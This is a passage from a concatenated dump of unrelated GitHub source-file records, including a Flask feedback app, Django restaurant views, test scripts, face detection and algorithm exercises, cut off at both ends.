 # Below evaluates the jobs to be submitted and adds them to the above list\n    listOfJobsToSubmit.append(job)\n    \n    # Below calls the list of jobs to be submitted and then prints the job IDs for each\n    # While it is not strictly necessary that one submits a list of jobs, it is a good\n    # habit to start, so we will only submit lists of jobs. 
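qb.submit() returns the submitted jobs with their supervisor-assigned IDs, which the loop below prints. 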
It is, however, perfectly\n    # acceptable to qb.submit(job)\n    listOfSubmittedJobs = qb.submit(listOfJobsToSubmit)\n    for job in listOfSubmittedJobs:\n        print(job['id'])\n# Below runs the \"main\" function\nif __name__ == \"__main__\":\n    main()\n    sys.exit(0)\n","repo_name":"NCCA/RenderFarmTests","sub_path":"ScratchCode/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16352829387","text":"'''\nGiven a list of integers, write a function that will return a list, in which for each index the element will be the product of all the integers except for the element at that index\n\nFor example, an input of [1,2,3,4] would return [24,12,8,6] by performing [2×3×4,1×3×4,1×2×4,1×2×3]\n'''\n\ndef index_prod(lst):\n\n    # Create an empty output list\n    output = [None] * len(lst)\n\n    # Set initial product and index for greedy run forward\n    product = 1\n    i = 0\n\n    while i < len(lst):\n\n        # Store the running product of all elements before index i\n        output[i] = product\n\n        # Cumulative product\n        product *= lst[i]\n\n        i += 1\n\n    print(\"output\", output)\n\n\n    # Now for our greedy run backwards\n    product = 1\n\n    # Start index at last (taking into account index 0)\n    i = len(lst) - 1\n\n    print(\"----\")\n\n    # Until the beginning of the list\n    while i >= 0:\n\n\n        # Same operations as before, just backwards\n        output[i] *= product\n        product *= lst[i]\n        i -= 1\n        print(\"output\", output)\n\n    return output\n\n\n\nindex_prod([1,2,3,4])\n","repo_name":"harishpuvvada/Algorithms-using-Python","sub_path":"Lists/product of ints.py","file_name":"product of ints.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"20604428306","text":"# -*- coding: windows-1251 -*-\nimport pytest\nimport ya_api\n\n\n@pytest.mark.parametrize(\n    \"folder_name, ref\",\n    ((\"test_folder\", 201), (\"test_folder\", 409))\n)\ndef test_create_folder(folder_name, ref):\n    res = ya_api.create_yandex_folder(folder_name)\n    assert res.status_code == ref","repo_name":"Satanas-Gigas/tests","sub_path":"tests/test_ya_api.py","file_name":"test_ya_api.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14472438759","text":"import logging\nimport time\n\nfrom batch_rpc_provider import BatchRpcProvider, BatchRpcException\n\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef test_get_balance():\n    token_address = \"0x2036807B0B3aaf5b1858EE822D0e111fDdac7018\"\n    call_data_params = []\n\n    mumbai_holders = []\n    logger.info(\"Load holders data...\")\n    with open(\"mumbai_holders.txt\") as r:\n        for line in r:\n            if line.strip():\n                mumbai_holders.append(line.strip())\n\n    logger.info(f\"Loaded {len(mumbai_holders)} mumbai GLM holders...\")\n\n    p = BatchRpcProvider('https://mumbai-temp.golem.network/api/rpc/polygon/MAaCpE421MddDmzMLcAp', 5)\n    logger.info(f\"Start multi call for {len(mumbai_holders)} holder addresses\")\n    start = time.time()\n    resp = p.get_erc20_balances(mumbai_holders, token_address)\n    end = time.time()\n\n    glm_total_amount = 0\n    for mumbai_holder_wallet, res in zip(mumbai_holders, resp):\n        glm_amount = int(res, 0) / 1000000000 / 1000000000\n        glm_total_amount += glm_amount\n        logger.debug(f\"Holder {mumbai_holder_wallet}: {glm_amount}\")\n\n    logger.info(f\"Total GLM amount found: {glm_total_amount}\")\n\n    
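# start/end bracket the single batched get_erc20_balances call above, so this logs the total round-trip time for all holder addresses.\n    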
logger.info(f\"Response took {end - start:0.3f}s\")\n\n\nif __name__ == \"__main__\":\n for i in range(0,10000):\n test_get_balance()\n\n\n","repo_name":"scx1332/multi-rpc-call","sub_path":"test_erc20_balances.py","file_name":"test_erc20_balances.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9587162042","text":"#!/usr/bin/env python\nimport numpy as np\nimport cv2 as cv\nimport glob\nimport re\n\nface_cascade = cv.CascadeClassifier(cv.haarcascades + 'haarcascade_frontalface_default.xml')\n\ndef load_image(filename):\n return cv.imread(filename)\n\ndef detect_face(img):\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n h, w = img.shape[:2]\n size = (w, h)\n center = (w / 2, h / 2)\n\n imgs = []\n for angle in range(0, 180):\n for angle in [angle, -angle]:\n rotation_matrix = cv.getRotationMatrix2D(center, angle, 1.0)\n img_rot = cv.warpAffine(img, rotation_matrix, size, flags = cv.INTER_CUBIC)\n faces = face_cascade.detectMultiScale(img_rot, 1.3, 5)\n if len(faces) > 0:\n for (x, y, w, h) in faces:\n imgs.append(img[y : y + h, x : x + w])\n return imgs\n return imgs\n\ndef show(img, faces):\n for (x, y, w, h) in faces:\n cv.rectangle(img, (x, y), (x + w), (y + h), (255, 0, 0), 2)\n cv.imshow('img',img)\n cv.waitKey(300)\n\ndef save(img, filename):\n cv.imwrite(filename, img)\n\ndef detect_face_in_directory(directory):\n files = glob.glob(directory + '/**/*.jpg')\n print(\"files in\", directory, len(files))\n\n img = load_image('train/japan/6525274.jpg')\n faces = detect_face(img)\n for filename in files:\n img = load_image(filename)\n faces = detect_face(img)\n\n for idx, face in enumerate(faces):\n save_filename = re.sub(r'\\.jpg', '-%d.jpg' % idx, filename.replace(directory, 'face_' + directory))\n cv.imwrite(save_filename, face)\n\nfor directory in ['train', 'test']:\n detect_face_in_directory(directory)\n","repo_name":"masarakki/genzouman","sub_path":"detect-face.py","file_name":"detect-face.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42530879236","text":"from flask import Flask, render_template, redirect, session, flash\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom sqlalchemy.exc import IntegrityError\n\n# from werkzeug.exceptions import Unauthorized\n\nfrom models import connect_db, db, User, Feedback\nfrom forms import RegisterForm, LoginForm, FeedbackForm\n\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgres:///flask_feedback_db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SECRET_KEY'] = \"shhhhh\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\n\ntoolbar = DebugToolbarExtension(app)\n\nconnect_db(app)\n\n\n@app.route(\"/\")\ndef redirect_to_homepage():\n \"\"\"Homepage of site; redirect to register.\"\"\"\n\n return redirect(\"/homepage\")\n\n\n@app.route(\"/homepage\")\ndef homepage():\n \"\"\"Homepage of site; redirect to register.\"\"\"\n all_feedback = Feedback.query.all()\n return render_template(\"homepage.html\", feedback=all_feedback)\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register_form():\n form = RegisterForm()\n\n if form.validate_on_submit():\n username = form.username.data\n password = form.password.data\n email = form.email.data\n first_name = form.first_name.data\n last_name = form.last_name.data\n\n new_user = 
User.register(\n            username, password, email, first_name, last_name)\n        db.session.add(new_user)\n        try:\n            db.session.commit()\n        except IntegrityError:\n            form.username.errors.append('Username or email already in use')\n            return render_template('register.html', form=form)\n        session['curr_user'] = new_user.username\n        flash(f'Welcome to the secret page {username}')\n        return redirect(f'/users/{new_user.username}')\n    return render_template('register.html', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login_form():\n    form = LoginForm()\n\n    if form.validate_on_submit():\n        username = form.username.data\n        password = form.password.data\n\n        user = User.authenticate(username, password)\n        if user:\n            flash(f'Welcome back, {user.username}')\n            session['curr_user'] = user.username\n            return redirect(f'/users/{user.username}')\n        else:\n            form.username.errors = ['Invalid username/password']\n\n    return render_template('login.html', form=form)\n\n\n@app.route('/logout')\ndef logout():\n    session.pop('curr_user')\n    flash(\"You've logged out\")\n    return redirect('/')\n\n\n@app.route('/users/<username>')\ndef user_page(username):\n    if 'curr_user' not in session:\n        flash('Please log in first')\n        return redirect('/')\n\n    user = User.query.get_or_404(username)\n    feedback = Feedback.query.filter_by(username=username)\n    return render_template('user_info.html', user=user, feedback=feedback)\n\n\n@app.route('/users/<username>/delete', methods=['POST'])\ndef delete_user(username):\n    \"\"\"Delete a user if signed in as said user\"\"\"\n\n    if \"curr_user\" not in session or session['curr_user'] != username:\n        flash('You don\\'t have permission to do that')\n        return redirect('/')\n\n    flash(f'User {username} has been deleted')\n    Feedback.query.filter_by(username=username).delete()\n    User.query.filter_by(username=username).delete()\n    db.session.commit()\n    session.pop('curr_user')\n    return redirect('/')\n\n\n@app.route('/users/<username>/feedback/add', methods=['GET', 'POST'])\ndef feedback_form(username):\n    \"\"\"Show form or add new feedback\"\"\"\n    if \"curr_user\" not in session or session['curr_user'] != username:\n        flash('You don\\'t have permission to do that')\n        return redirect('/')\n\n    form = FeedbackForm()\n\n    if form.validate_on_submit():\n        title = form.title.data\n        content = form.content.data\n        new_feedback = Feedback(\n            title=title, content=content, username=username)\n        db.session.add(new_feedback)\n        db.session.commit()\n        return redirect(f'/users/{username}')\n\n    return render_template('feedback_form.html', form=form, username=username)\n\n\n@app.route('/feedback/<int:feedback_id>/update', methods=['GET', 'POST'])\ndef feedback_update_form(feedback_id):\n    \"\"\"Show form or update existing feedback\"\"\"\n    feedback = Feedback.query.get_or_404(feedback_id)\n    if \"curr_user\" not in session or session['curr_user'] != feedback.username:\n        flash('You don\\'t have permission to do that')\n        return redirect('/')\n\n    form = FeedbackForm(obj=feedback)\n\n    if form.validate_on_submit():\n        feedback.title = form.title.data\n        feedback.content = form.content.data\n        db.session.add(feedback)\n        db.session.commit()\n        return redirect(f'/users/{feedback.username}')\n\n    return render_template('feedback_edit.html', form=form, feedback=feedback)\n\n\n@app.route('/feedback/<int:feedback_id>/delete', methods=['POST'])\ndef delete_feedback(feedback_id):\n    \"\"\"Delete feedback\"\"\"\n    feedback = Feedback.query.get_or_404(feedback_id)\n    if \"curr_user\" not in session or session['curr_user'] != feedback.username:\n        flash('You don\\'t have permission to do that')\n        return 
redirect('/')\n\n db.session.delete(feedback)\n db.session.commit()\n\n return redirect(f'/users/{feedback.username}')\n","repo_name":"tdj182/Flask-Feedback","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18092118898","text":"import attr\nfrom navmazing import NavigateToAttribute\nfrom navmazing import NavigateToSibling\nfrom widgetastic.widget import Table\nfrom widgetastic.widget import Text\nfrom widgetastic.widget import TextInput\nfrom widgetastic_patternfly import Button\nfrom widgetastic_patternfly import Input\n\nfrom cfme.control.explorer import ControlExplorerView\nfrom cfme.modeling.base import BaseCollection\nfrom cfme.modeling.base import BaseEntity\nfrom cfme.utils.appliance.implementations.ui import CFMENavigateStep\nfrom cfme.utils.appliance.implementations.ui import navigate_to\nfrom cfme.utils.appliance.implementations.ui import navigator\nfrom cfme.utils.pretty import Pretty\nfrom cfme.utils.update import Updateable\nfrom widgetastic_manageiq import MultiBoxSelect\n\n\nclass PolicyProfileFormCommon(ControlExplorerView):\n title = Text(\"#explorer_title_text\")\n\n description = Input(name=\"description\")\n notes = TextInput(name=\"notes\")\n policies = MultiBoxSelect()\n cancel_button = Button(\"Cancel\")\n\n\nclass NewPolicyProfileView(PolicyProfileFormCommon):\n add_button = Button(\"Add\")\n\n @property\n def is_displayed(self):\n return (\n self.in_control_explorer and\n self.title.text == \"Adding a new Policy Profile\" and\n self.policy_profiles.tree.currently_selected == [\"All Policy Profiles\"]\n )\n\n\nclass EditPolicyProfileView(PolicyProfileFormCommon):\n save_button = Button(\"Save\")\n\n @property\n def is_displayed(self):\n return (\n self.in_control_explorer and\n self.title.text == 'Editing Policy Profile \"{}\"'.format(\n self.context[\"object\"].description) and\n self.policy_profiles.tree.currently_selected == [\n \"All Policy Profiles\",\n self.context[\"object\"].description\n ]\n )\n\n\nclass PolicyProfileDetailsView(ControlExplorerView):\n title = Text(\"#explorer_title_text\")\n\n @property\n def is_displayed(self):\n return (\n self.in_control_explorer and\n self.title.text == 'Policy Profile \"{}\"'.format(self.context[\"object\"].description)\n )\n\n\nclass PolicyProfilesAllView(ControlExplorerView):\n title = Text(\"#explorer_title_text\")\n entities = Table(\".//div[@id='main_div']/table\")\n\n @property\n def is_displayed(self):\n\n return (\n self.in_control_explorer and\n # BZ(1516302)\n 'All Policy Profile' in self.title.text\n )\n\n\n@attr.s\nclass PolicyProfile(BaseEntity, Updateable, Pretty):\n\n description = attr.ib()\n policies = attr.ib()\n notes = attr.ib(default=None)\n\n def update(self, updates):\n \"\"\"Update this Policy Profile in UI.\n\n Args:\n updates: Provided by update() context manager.\n cancel: Whether to cancel the update (default False).\n \"\"\"\n view = navigate_to(self, \"Edit\")\n changed = view.fill(updates)\n if changed:\n view.save_button.click()\n else:\n view.cancel_button.click()\n view = self.create_view(PolicyProfileDetailsView, override=updates, wait='10s')\n view.flash.assert_no_error()\n if changed:\n view.flash.assert_message(\n 'Policy Profile \"{}\" was saved'.format(\n updates.get(\"description\", self.description)))\n else:\n view.flash.assert_message(\n f'Edit of Policy Profile \"{self.description}\" was cancelled by the user')\n\n def delete(self, 
cancel=False):\n \"\"\"Delete this Policy Profile in UI.\n\n Args:\n cancel: Whether to cancel the deletion (default False).\n \"\"\"\n view = navigate_to(self, \"Details\")\n view.configuration.item_select(\"Remove this Policy Profile\", handle_alert=not cancel)\n if cancel:\n assert view.is_displayed\n view.flash.assert_no_error()\n else:\n view = self.create_view(PolicyProfilesAllView)\n assert view.is_displayed\n view.flash.assert_success_message(\n f'Policy Profile \"{self.description}\": Delete successful')\n\n @property\n def exists(self):\n \"\"\"Check existence of this Policy Profile.\n\n Returns: :py:class:`bool` signalizing the presence of the Policy Profile in database.\n \"\"\"\n miq_sets = self.appliance.db.client[\"miq_sets\"]\n return self.appliance.db.client.session\\\n .query(miq_sets.description)\\\n .filter(\n miq_sets.description == self.description and miq_sets.set_type == \"MiqPolicySet\")\\\n .count() > 0\n\n\n@attr.s\nclass PolicyProfileCollection(BaseCollection):\n\n ENTITY = PolicyProfile\n\n def create(self, description, policies, notes=None):\n policy_profile = self.instantiate(description, policies, notes=notes)\n view = navigate_to(self, \"Add\")\n view.fill({\n \"description\": policy_profile.description,\n \"notes\": policy_profile.notes,\n \"policies\": [policy.name_for_policy_profile for policy in policy_profile.policies]\n })\n view.add_button.click()\n view = policy_profile.create_view(PolicyProfileDetailsView)\n assert view.is_displayed\n view.flash.assert_success_message('Policy Profile \"{}\" was added'.format(\n policy_profile.description))\n return policy_profile\n\n @property\n def all_policy_profile_names(self):\n view = navigate_to(self, \"All\")\n return [row[1].text for row in view.entities]\n\n\n@navigator.register(PolicyProfileCollection, \"All\")\nclass PolicyProfileAll(CFMENavigateStep):\n VIEW = PolicyProfilesAllView\n prerequisite = NavigateToAttribute(\"appliance.server\", \"ControlExplorer\")\n\n def step(self, *args, **kwargs):\n self.prerequisite_view.policy_profiles.tree.click_path(\"All Policy Profiles\")\n\n\n@navigator.register(PolicyProfileCollection, \"Add\")\nclass PolicyProfileNew(CFMENavigateStep):\n VIEW = NewPolicyProfileView\n prerequisite = NavigateToSibling(\"All\")\n\n def step(self, *args, **kwargs):\n self.prerequisite_view.configuration.item_select(\"Add a New Policy Profile\")\n\n\n@navigator.register(PolicyProfile, \"Edit\")\nclass PolicyProfileEdit(CFMENavigateStep):\n VIEW = EditPolicyProfileView\n prerequisite = NavigateToSibling(\"Details\")\n\n def step(self, *args, **kwargs):\n self.prerequisite_view.configuration.item_select(\"Edit this Policy Profile\")\n\n\n@navigator.register(PolicyProfile, \"Details\")\nclass PolicyProfileDetails(CFMENavigateStep):\n VIEW = PolicyProfileDetailsView\n prerequisite = NavigateToAttribute(\"parent\", \"All\")\n\n def step(self, *args, **kwargs):\n self.prerequisite_view.policy_profiles.tree.click_path(\n \"All Policy Profiles\",\n self.obj.description\n )\n","repo_name":"ManageIQ/integration_tests","sub_path":"cfme/control/explorer/policy_profiles.py","file_name":"policy_profiles.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"77"} +{"seq_id":"8173663875","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup, Extension\n\n_cdblib_module = Extension('_cdblib', sources=['_cdblib.c'])\n\nsetup(author='David Wilson',\n author_email='dw@botanicus.net',\n description=\"Pure 
Python reader/writer for Dan J. Bernstein's CDB format.\",\n      download_url='https://github.com/dw/python-pure-cdb',\n      keywords='cdb file format appengine database db',\n      license='MIT',\n      name='pure-cdb',\n      py_modules=['cdblib'],\n      ext_modules=[_cdblib_module],\n      version='1.0'\n)\n","repo_name":"douglasbagnall/python-pure-cdb","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"8191498515","text":"class Solution:\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n        dict_obj = {}\n\n        for i, num in enumerate(nums):\n            remainder = target - num\n            if remainder in dict_obj:\n                return [dict_obj[remainder], i]\n\n            dict_obj[num] = i","repo_name":"DishantK1807/Leetcode-Practice","sub_path":"01 - Two Sum/PythonSolution_2.py","file_name":"PythonSolution_2.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39141820819","text":"import numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nimport faiss\n\n\ndef loadWPCA(reduced_dim):\n    \"\"\"\n    Apply Dimension Reduction (PCA+Whitening)\n    \"\"\"\n    wpca = torch.load('pca'+str(reduced_dim)+'.pth')\n    from UnifiedModel.Backbone import L2Norm\n    l2 = L2Norm()\n    return torch.nn.Sequential(wpca, l2)\n\n\ndef test(rv, opt, epoch=0, write_tboard=False):\n    # wpca = loadWPCA(5120).to(rv.device)\n\n    # TODO what if features don't fit in memory?\n    test_data_loader = DataLoader(dataset=rv.whole_test_set, num_workers=opt.threads,\n                                  batch_size=opt.cacheBatchSize, shuffle=False,\n                                  pin_memory=True)\n\n    rv.model.eval()\n    with torch.no_grad():\n        print('====> Extracting Features')\n        pool_size = rv.encoder_dim\n        if opt.pooling.lower() == 'netvlad':\n            pool_size *= opt.num_clusters\n        print(pool_size)\n        # pool_size = 5120\n        dbFeat = np.empty((len(rv.whole_test_set), pool_size))\n\n        for iteration, (input, indices) in enumerate(test_data_loader, 1):\n            input = input.to(rv.device)\n            image_encoding = rv.model.encoder(input)\n            del input\n            if opt.withAttention:\n                image_encoding = rv.model.attention(image_encoding)\n                vlad_encoding = rv.model.pool(image_encoding)\n                del image_encoding\n            else:\n                vlad_encoding = rv.model.pool(image_encoding)\n                del image_encoding\n\n            # vlad_encoding = wpca(vlad_encoding.unsqueeze(-1).unsqueeze(-1)).squeeze(-1).squeeze(-1)\n            dbFeat[indices.detach().numpy(), :] = vlad_encoding.detach().cpu().numpy()\n            if iteration % 50 == 0 or len(test_data_loader) <= 10:\n                print(\"==> Batch ({}/{})\".format(iteration, len(test_data_loader)), flush=True)\n\n            del vlad_encoding\n            # torch.cuda.empty_cache()\n\n        del test_data_loader\n        torch.cuda.empty_cache()\n\n        # extracted for both db and query, now split in own sets\n        qFeat = dbFeat[rv.whole_test_set.dbStruct.numDb:].astype('float32')\n        dbFeat = dbFeat[:rv.whole_test_set.dbStruct.numDb].astype('float32')\n\n        print('====> Building faiss index')\n        # res = faiss.StandardGpuResources()  # use a single GPU\n        # build a flat (CPU) index\n        index_flat = faiss.IndexFlatL2(pool_size)\n        # make it into a gpu index\n        # gpu_index_flat = faiss.index_cpu_to_gpu(res, 0, index_flat)\n        # add vectors to the index\n        index_flat.add(dbFeat)\n\n        # faiss_index = faiss.IndexFlatL2(pool_size)\n        # faiss_index.add(dbFeat)\n\n        print('====> Calculating recall @ N')\n        n_values = [1, 5, 10, 20]\n        if opt.dataset.lower() == 'tokyo247':\n            n_values = [10, 50, 100, 200]\n\n        import time\n        since = time.time()\n        _, 
predictions = index_flat.search(qFeat, max(n_values))\n        time_elapsed = time.time() - since\n        print('searching time per query (ms)', 1000*time_elapsed/rv.whole_test_set.dbStruct.numQ)\n\n        predictionNew = []\n        if opt.dataset.lower() == 'tokyo247':\n            for idx, pred in enumerate(predictions):\n                keep = [True for pidx in pred if rv.whole_test_set.dbStruct.dbTimeStamp[pidx] != rv.whole_test_set.dbStruct.qTimeStamp[idx]]\n                # or (not (eval_set.dbStruct.utmDb[pidx] == eval_set.dbStruct.utmQ[idx]).all())]\n                pred_keep = [pred[idxiii] for idxiii, iii in enumerate(keep) if iii is True]\n                predictionNew.append(pred_keep[:max(n_values) // 10])\n            predictions = predictionNew\n            n_values = [1, 5, 10, 20]\n        # elif opt.dataset.lower() == 'pittsburgh':\n        #     for idx, pred in enumerate(predictions):\n        #         keep = [True for pidx in pred if not (eval_set.dbStruct.utmDb[pidx] == eval_set.dbStruct.utmQ[idx]).all()]\n        #         pred_keep = [pred[idxiii] for idxiii, iii in enumerate(keep) if iii is True]\n        #         predictionNew.append(pred_keep[:max(n_values)//10])\n        #     predictions = predictionNew\n        #     n_values = [1, 5, 10, 20]\n\n        # for each query get those within threshold distance\n        gt = rv.whole_test_set.get_positives()\n\n        correct_at_n = np.zeros(len(n_values))\n        gtValid = 0\n        # TODO can we do this on the matrix in one go?\n        for qIx, pred in enumerate(predictions):\n            # print(pred)\n            # print(gt[qIx])\n            if gt[qIx].size:\n                gtValid += 1\n                for i, n in enumerate(n_values):\n                    # if in top N then also in top NN, where NN > N\n                    if np.any(np.in1d(pred[:n], gt[qIx])):\n                        correct_at_n[i:] += 1\n                        break\n        recall_at_n = correct_at_n / gtValid # eval_set.dbStruct.numQ\n\n        recalls = {} # make dict for output\n        for i, n in enumerate(n_values):\n            recalls[n] = recall_at_n[i]\n            print(\"====> Recall@{}: {:.4f}\".format(n, recall_at_n[i]))\n            #if write_tboard: writer.add_scalar('Val/Recall@' + str(n), recall_at_n[i], epoch)\n\n    return recalls\n","repo_name":"chengricky/ScenePlaceRecognition","sub_path":"TestScript.py","file_name":"TestScript.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"3166376873","text":"from tkinter import messagebox, ttk\nfrom tkinter import *\nimport random, os\nimport sqlite3\n\nclass Match:\n    db_name = 'dictionary.db'\n\n    def __init__(self, window):\n\n        self.wind = window\n        self.wind.title(\"Customers' data\")\n        self.eng, self.trans = str(), str()\n        self.message = Label(text = '', fg = 'red')\n        self.message.grid(row = 1, column = 0, columnspan = 2, sticky = W + E)\n        self.left = Listbox(height = 12, exportselection=False, activestyle='none')\n        self.left.grid(row = 2, column = 0)\n        self.right = Listbox(height = 12, activestyle='none')\n        self.right.grid(row = 2, column = 1)\n        self.right.bind(\"<<ListboxSelect>>\", self.callback_right)\n        self.left.bind(\"<<ListboxSelect>>\", self.callback_left)\n        ttk.Button(text=\"Return\", command=self.restart_program).grid(row = 4, column = 1, sticky = W + E)\n        ttk.Button(text=\"Edit\", command=self.run_edit).grid(row = 4, column = 0, sticky = W + E)\n        self.wind.protocol(\"WM_DELETE_WINDOW\", self.on_exit)\n        self.get_names()\n    def on_exit(self):\n        if messagebox.askyesno(\"Exit\", \"Close?\"):\n            self.wind.destroy()\n    def run_query(self, query, parameters = ()):\n        with sqlite3.connect(self.db_name) as conn:\n            cursor = conn.cursor()\n            result = cursor.execute(query, parameters)\n            conn.commit()\n        return result\n    \n    def get_names(self):\n        query = 'SELECT * FROM dictionary ORDER BY name DESC'\n        db_rows = self.run_query(query)\n        lst_left, 
lst_right = [], []\n        for row in db_rows:\n            lst_left.append(row[1])\n            lst_right.append(row[2])\n        random.shuffle(lst_left)\n        random.shuffle(lst_right)\n        dic = dict(zip(lst_left, lst_right))\n        for k, v in dic.items():\n            self.left.insert(END, k)\n            self.right.insert(END, v)\n    def callback_left(self, event):\n        self.message['text'] = ''\n        if not event.widget.curselection():\n            return\n        w = event.widget\n        idx = int(w.curselection()[0])\n        self.eng = w.get(idx)\n        with sqlite3.connect(self.db_name) as conn:\n            cursor = conn.cursor()\n            sqlite_select_query = 'SELECT * from dictionary WHERE name = ?'\n            cursor.execute(sqlite_select_query, (self.eng,))\n            record = cursor.fetchone()\n            self.trans = record[2]\n    \n    def callback_right(self, event1):\n        self.message['text'] = ''\n        if not event1.widget.curselection():\n            return\n        \n        w = event1.widget\n        idx = int(w.curselection()[0])\n        click = w.get(idx)\n        if click == self.trans:\n            self.right.delete(ANCHOR)\n            self.left.delete(ANCHOR)\n        else:\n            self.message['text'] = 'Incorrect'\n            self.right.selection_clear(0, END)\n    def run_edit(self):\n        os.system('edit_data.py')\n    def restart_program(self):\n        self.message['text'] = ''\n        self.left.delete(0, END)\n        self.right.delete(0, END)\n        self.get_names()\n\nif __name__ == '__main__':\n    window = Tk()\n    window.geometry('250x245+350+200')\n    application = Match(window)\n    window.mainloop()\n","repo_name":"urnotrme/Internship-Project","sub_path":"data_list.py","file_name":"data_list.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17727319865","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('music', '0003_auto_20150320_1520'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Item1',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('item_id', models.CharField(max_length=30)),\n                ('item_name', models.CharField(max_length=50)),\n                ('art_name', models.CharField(max_length=30)),\n                ('item_link', models.URLField()),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.AddField(\n            model_name='user',\n            name='age',\n            field=models.IntegerField(default=0),\n            preserve_default=True,\n        ),\n    ]\n","repo_name":"pipilove/WebSite","sub_path":"musicapp/music/migrations/0004_auto_20150320_1542.py","file_name":"0004_auto_20150320_1542.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9395510300","text":"from datetime import date\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.gis.geos import GEOSGeometry\nfrom django.contrib.gis.measure import D\nfrom django.contrib.gis.db.models.functions import Distance\nfrom django.db import IntegrityError\nfrom django.db.models import Prefetch, Q\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import View, ListView, DetailView\n\nfrom accounts.forms import UserProfileForm\nfrom accounts.models import UserProfile\nfrom cart.models import Cart\nfrom menu.models import Category, FoodItem\nfrom menu.utils import get_restaurant\nfrom orders.models import Order\nfrom .forms import RestaurantForm, OpeningHourForm, UserInfoForm, 
CheckoutForm\nfrom .models import Restaurant, OpeningHour\n\n\ndef get_or_set_current_location(request):\n if \"lat\" in request.session:\n lat = request.session[\"lat\"]\n lng = request.session[\"lng\"]\n return lat, lng\n elif \"lat\" in request.GET:\n lat = request.GET.get(\"lat\")\n lng = request.GET.get(\"lng\")\n request.session[\"lat\"] = lat\n request.session[\"lng\"] = lng\n return lat, lng\n else:\n return None\n\n\nclass HomePageView(ListView):\n model = Restaurant\n template_name = \"core/index.html\"\n context_object_name = \"restaurant_list\"\n\n def get_queryset(self):\n if get_or_set_current_location(self.request) is not None:\n latitude, longitude = get_or_set_current_location(self.request)\n pnt = GEOSGeometry(f\"POINT({longitude} {latitude})\", srid=4326)\n restaurant_list = (\n Restaurant.objects.filter(\n user_profile__location__distance_lte=(pnt, D(km=1000)),\n is_approved=True,\n user__is_active=True,\n )\n .annotate(distance=Distance(\"user_profile__location\", pnt))\n .order_by(\"distance\")\n )[:8]\n\n for restaurant in restaurant_list:\n restaurant.kms = round(restaurant.distance.km, 1)\n else:\n restaurant_list = Restaurant.objects.filter(\n is_approved=True, user__is_active=True\n )[:8]\n return restaurant_list\n\n\nclass RestaurantListView(ListView):\n model = Restaurant\n template_name = \"core/restaurant_list.html\"\n context_object_name = \"restaurant_list\"\n\n def get_queryset(self):\n restaurant_list = Restaurant.objects.filter(\n is_approved=True, user__is_active=True\n )[:8]\n return restaurant_list\n\n\nclass RestaurantProfileView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n user_profile = UserProfile.objects.get(user=request.user)\n restaurant = Restaurant.objects.get(user_profile=user_profile)\n\n context = {\n \"user_profile\": user_profile,\n \"restaurant\": restaurant,\n \"form\": UserProfileForm(instance=user_profile),\n \"r_form\": RestaurantForm(instance=restaurant),\n }\n\n return render(request, \"core/restaurant_profile.html\", context)\n\n def post(self, request, *args, **kwargs):\n user_profile = UserProfile.objects.get(user=request.user)\n restaurant = Restaurant.objects.get(user_profile=user_profile)\n form = UserProfileForm(request.POST, request.FILES, instance=user_profile)\n r_form = RestaurantForm(request.POST, request.FILES, instance=restaurant)\n if form.is_valid() and r_form.is_valid():\n form.save()\n r_form.save()\n messages.success(request, \"Your profile was updated successfully!\")\n return redirect(\"core:restaurant_profile\")\n else:\n messages.error(request, 